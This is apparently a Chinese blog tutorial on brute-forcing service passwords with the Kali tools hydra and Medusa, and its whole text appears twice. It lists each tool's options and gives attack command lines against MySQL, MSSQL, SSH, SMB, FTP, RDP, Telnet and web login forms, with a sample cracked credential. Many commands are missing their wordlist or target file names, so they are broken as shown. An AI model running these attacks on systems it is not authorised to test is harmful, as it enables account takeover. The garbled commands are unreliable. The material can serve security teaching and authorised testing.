2023年7月31日发(作者:)

渗透利器-kali⼯具(第六章-2)利⽤hydra暴⼒破解密码本⽂内容:hydra简介hydra安装配置hrdra破解Medusa

1,hydra简介:  hydra的中⽂意思是就透彻,它是⼀款爆破神器,可以对多种服务的账号和密码进⾏爆破,包括Web登录、数据库、SSH、Ftp等服务。  ⽀持Linux、Windows、Mac平台安装,其中Kali Linux中⾃带hydra。  Hydra⽀持的服务有:POP3、SMB、RDP,SSH,FTP,POP3,Telnet,MYSQL……  最⼤的安全漏洞之⼀是弱⼝令。2,hydra安装配置:  Kali Linux中hydra⾃带。    Kali是安全从业⼈员常⽤的Linux系统,⾃带有⼤量安全⼯具,hydra⾃然也继承在⾥⾯。    ⼯具位置:密码攻击--在线攻击⼀栏  Windows中hydra安装:3,hydra破解:  相关参数:    -l   LOGIN   指定破解的⽤户名成,对特定⽤户破解    -L   FILE    从⽂件中加载⽤户名进⾏破解。    -p   PASS   ⼩写p执⾏密码破解,少⽤,⼀般是采⽤密码字典。    -P   FILE    ⼤写字母P,指定密码字典。    -e       ns 可选选项,n:空密码试探,s:使⽤指定⽤户和密码[相同]试探。    -C   FILE    使⽤冒号分隔格式,例如"登录:密码"来代替-L/-P参数。    -t   TASKS  同时运⾏的链接的线程数,每⼀台主机默认为16    -M   FILE   指定服务器⽬标列表⽂件⼀⾏⼀条。    -w   TIME   设置最⼤超时的时间,单位秒,默认是30s。    -O   FILE   指定结果输出⽂件。    -f        在使⽤-M参数以后,找到第⼀对登录名或者密码的时候终⽌破解。    -v/-V       显⽰详细过程。    -R       继续从上⼀次进度接着破解。    -S        采⽤SSL链接。    -s   PORT   可通过这个参数指定⾮默认端⼝。    -U       服务模块使⽤细节    -h      更多的命令⾏选项[完成的帮助]    server      ⽬标服务器名称或者IP[使⽤这个或-M选项]    service     指定服务名,⽀持的服务核协议telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-formhttp-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icqsapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等    OPT ⼀些服务模块⽀持额外的输⼊[-U⽤于模块的帮助]    例如:[⽤法]:         hydra -l user -P ftp://192.168.0.1      hydra -L -p defaultpw imap://192.168.0.1/PLAIN      hydra -C -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5      hydra -l admin -p password ftp://[192.168.0.0/24]/      hydra -L -P -M ssh  ⽤法案例:    图形化界⾯:xhydra[推荐还是命令直接搞]    案例1:      破解Mysql密码      数据库⼀般会提供⼀个默认的账户,sql server的sa与⽤户,Mysql的root⽤户,Oracle的System⽤户等。      假如我们现在破解Mysql数据库:        hydra -L -P ip mysql        hydra -L -P mysql://⽬标ip:mysql端⼝号      如果需要将爆破的过程打印出来就加个指令-v        hydra -L -P -v

        mysql://⽬标ip:mysql端⼝号      成功后会打印类似如下的信息:        [3306][mysql] host:ip login:sa password:sqladmin    案例2:      破解SSH:        hydra -l ⽤户名 -P 密码字典 -t 线程 -v/V -e ns -f ip ssh        hydra -l root -P /root/桌⾯/ -t 6 -V -e ns -f 192.168.62.129 ssh        hydra -l ⽤户名 -P 密码字典 -t 线程 -o -vV -f ip ssh      命令详细:        攻击⽬标:192.168.62.128        使⽤的模块:ssh        爆破⽤户名:root (-1)        使⽤的密码字典:/root/ (-P)        爆破线程数:6 (-t)        显⽰详细信息 (-V)        爆破成功⼀个后提⽰(-f)    其他案例:      s密码破解:        hydra -l ⽤户名 -p 密码 smb://ip -vV

或者

hydra -l ⽤户名 -p 密码 smb ip –vV      2.破解Ftp:        hydra ip ftp -l ⽤户名 -P 密码字典 -t 线程数(默认16) –vV        如果你发现⽬标ftp并不是在21端⼝,⽽是在其他端⼝上,可以使⽤-s参数指定正确的端⼝,其他服务同样如此      3.破解rdp:        hydra ip rdp -l administrator -P –V      4.破解telnet:        hydra ip telnet -l ⽤户 -P 密码字典 -t 32 -s 23 -e ns -f –V      5.破解HTTPS:        hydra -m / -l muts -P ip https      ⽅式提交,破解Web登录[不推荐,太过鸡肋]:        hydra -l ⽤户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /web/      ⽅式提交,破解Web登录[不⿁剑,太过鸡肋]:        hydra -l ⽤户名 -P 密码字典 ip http-post-form"/admin/:username=^USER^&password=^PASS^&submit=login:sorry password" -V

    的缺点:    1.稳定性差,程序时常崩溃。    2.速度控制不好,容易触发服务器屏蔽或锁死机制。    3.每主机新建进程,没服务新建实例。    4.⼤量⽬标破解时性能差。4,美杜莎-Medusa:  的特点:    1.稳定性好。    2.速度控制得当。    3.基于线程。    4.⽀持模块少于hydra[不⽀持rdp远程桌⾯]    -Form⽀持存在缺陷  参数:        -h   [TEXT]      ⽬标IP    -H   [FILE]      ⽬标主机⽂件    -u   [TEXT]      ⽤户名    -U   [FILE]      ⽤户名⽂件    -p   [TEXT]     密码    -P   [FILE]      密码⽂件    -C   [FILE]      组合条⽬⽂件    -O   [FILE]      ⽂件⽇志信息[保存扫描结果]    -e           [n/s/nsN意为空密码,S意为密码与⽤户名相同    -M   [TEXT]     模块执⾏名称    -m   [TEXT]     传递参数到模块    -d         显⽰所有的模块名称    -n   [NUM]     使⽤⾮默认端⼝    -s         启⽤SSL    -r   [NUM]      重试间隔时间,默认为3秒    -t   [NUM]     设定线程数量    -L         并⾏化,每个⽤户使⽤⼀个线程    -f          在任何主机上找到第⼀个账号/密码后,停⽌破解    -q        显⽰模块的使⽤信息    -v   [NUM]     详细级别(0-6)    -w  [NUM]     错误调试级别(0-10)    -V        显⽰版本    -Z   [TEXT]     继续扫描上⼀次  使⽤:    1.使⽤语法:      medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]    2.破解MSSQL:      medusa -h ip -u root -P / -t 5 -f -M mssql    3.破解ssh:      medusa -M ssh -H -U -p password    4.输出⽇志⽂件:      medusa -h ip -u sa -P / -t 5 -f -e ns -M mssql -O /

2023年7月31日发(作者:)

渗透利器-kali⼯具(第六章-2)利⽤hydra暴⼒破解密码本⽂内容:hydra简介hydra安装配置hrdra破解Medusa

1,hydra简介:  hydra的中⽂意思是就透彻,它是⼀款爆破神器,可以对多种服务的账号和密码进⾏爆破,包括Web登录、数据库、SSH、Ftp等服务。  ⽀持Linux、Windows、Mac平台安装,其中Kali Linux中⾃带hydra。  Hydra⽀持的服务有:POP3、SMB、RDP,SSH,FTP,POP3,Telnet,MYSQL……  最⼤的安全漏洞之⼀是弱⼝令。2,hydra安装配置:  Kali Linux中hydra⾃带。    Kali是安全从业⼈员常⽤的Linux系统,⾃带有⼤量安全⼯具,hydra⾃然也继承在⾥⾯。    ⼯具位置:密码攻击--在线攻击⼀栏  Windows中hydra安装:3,hydra破解:  相关参数:    -l   LOGIN   指定破解的⽤户名成,对特定⽤户破解    -L   FILE    从⽂件中加载⽤户名进⾏破解。    -p   PASS   ⼩写p执⾏密码破解,少⽤,⼀般是采⽤密码字典。    -P   FILE    ⼤写字母P,指定密码字典。    -e       ns 可选选项,n:空密码试探,s:使⽤指定⽤户和密码[相同]试探。    -C   FILE    使⽤冒号分隔格式,例如"登录:密码"来代替-L/-P参数。    -t   TASKS  同时运⾏的链接的线程数,每⼀台主机默认为16    -M   FILE   指定服务器⽬标列表⽂件⼀⾏⼀条。    -w   TIME   设置最⼤超时的时间,单位秒,默认是30s。    -O   FILE   指定结果输出⽂件。    -f        在使⽤-M参数以后,找到第⼀对登录名或者密码的时候终⽌破解。    -v/-V       显⽰详细过程。    -R       继续从上⼀次进度接着破解。    -S        采⽤SSL链接。    -s   PORT   可通过这个参数指定⾮默认端⼝。    -U       服务模块使⽤细节    -h      更多的命令⾏选项[完成的帮助]    server      ⽬标服务器名称或者IP[使⽤这个或-M选项]    service     指定服务名,⽀持的服务核协议telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-formhttp-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icqsapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等    OPT ⼀些服务模块⽀持额外的输⼊[-U⽤于模块的帮助]    例如:[⽤法]:         hydra -l user -P ftp://192.168.0.1      hydra -L -p defaultpw imap://192.168.0.1/PLAIN      hydra -C -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5      hydra -l admin -p password ftp://[192.168.0.0/24]/      hydra -L -P -M ssh  ⽤法案例:    图形化界⾯:xhydra[推荐还是命令直接搞]    案例1:      破解Mysql密码      数据库⼀般会提供⼀个默认的账户,sql server的sa与⽤户,Mysql的root⽤户,Oracle的System⽤户等。      假如我们现在破解Mysql数据库:        hydra -L -P ip mysql        hydra -L -P mysql://⽬标ip:mysql端⼝号      如果需要将爆破的过程打印出来就加个指令-v        hydra -L -P -v

        mysql://⽬标ip:mysql端⼝号      成功后会打印类似如下的信息:        [3306][mysql] host:ip login:sa password:sqladmin    案例2:      破解SSH:        hydra -l ⽤户名 -P 密码字典 -t 线程 -v/V -e ns -f ip ssh        hydra -l root -P /root/桌⾯/ -t 6 -V -e ns -f 192.168.62.129 ssh        hydra -l ⽤户名 -P 密码字典 -t 线程 -o -vV -f ip ssh      命令详细:        攻击⽬标:192.168.62.128        使⽤的模块:ssh        爆破⽤户名:root (-1)        使⽤的密码字典:/root/ (-P)        爆破线程数:6 (-t)        显⽰详细信息 (-V)        爆破成功⼀个后提⽰(-f)    其他案例:      s密码破解:        hydra -l ⽤户名 -p 密码 smb://ip -vV

或者

hydra -l ⽤户名 -p 密码 smb ip –vV      2.破解Ftp:        hydra ip ftp -l ⽤户名 -P 密码字典 -t 线程数(默认16) –vV        如果你发现⽬标ftp并不是在21端⼝,⽽是在其他端⼝上,可以使⽤-s参数指定正确的端⼝,其他服务同样如此      3.破解rdp:        hydra ip rdp -l administrator -P –V      4.破解telnet:        hydra ip telnet -l ⽤户 -P 密码字典 -t 32 -s 23 -e ns -f –V      5.破解HTTPS:        hydra -m / -l muts -P ip https      ⽅式提交,破解Web登录[不推荐,太过鸡肋]:        hydra -l ⽤户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /web/      ⽅式提交,破解Web登录[不⿁剑,太过鸡肋]:        hydra -l ⽤户名 -P 密码字典 ip http-post-form"/admin/:username=^USER^&password=^PASS^&submit=login:sorry password" -V

    的缺点:    1.稳定性差,程序时常崩溃。    2.速度控制不好,容易触发服务器屏蔽或锁死机制。    3.每主机新建进程,没服务新建实例。    4.⼤量⽬标破解时性能差。4,美杜莎-Medusa:  的特点:    1.稳定性好。    2.速度控制得当。    3.基于线程。    4.⽀持模块少于hydra[不⽀持rdp远程桌⾯]    -Form⽀持存在缺陷  参数:        -h   [TEXT]      ⽬标IP    -H   [FILE]      ⽬标主机⽂件    -u   [TEXT]      ⽤户名    -U   [FILE]      ⽤户名⽂件    -p   [TEXT]     密码    -P   [FILE]      密码⽂件    -C   [FILE]      组合条⽬⽂件    -O   [FILE]      ⽂件⽇志信息[保存扫描结果]    -e           [n/s/nsN意为空密码,S意为密码与⽤户名相同    -M   [TEXT]     模块执⾏名称    -m   [TEXT]     传递参数到模块    -d         显⽰所有的模块名称    -n   [NUM]     使⽤⾮默认端⼝    -s         启⽤SSL    -r   [NUM]      重试间隔时间,默认为3秒    -t   [NUM]     设定线程数量    -L         并⾏化,每个⽤户使⽤⼀个线程    -f          在任何主机上找到第⼀个账号/密码后,停⽌破解    -q        显⽰模块的使⽤信息    -v   [NUM]     详细级别(0-6)    -w  [NUM]     错误调试级别(0-10)    -V        显⽰版本    -Z   [TEXT]     继续扫描上⼀次  使⽤:    1.使⽤语法:      medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]    2.破解MSSQL:      medusa -h ip -u root -P / -t 5 -f -M mssql    3.破解ssh:      medusa -M ssh -H -U -p password    4.输出⽇志⽂件:      medusa -h ip -u sa -P / -t 5 -f -e ns -M mssql -O /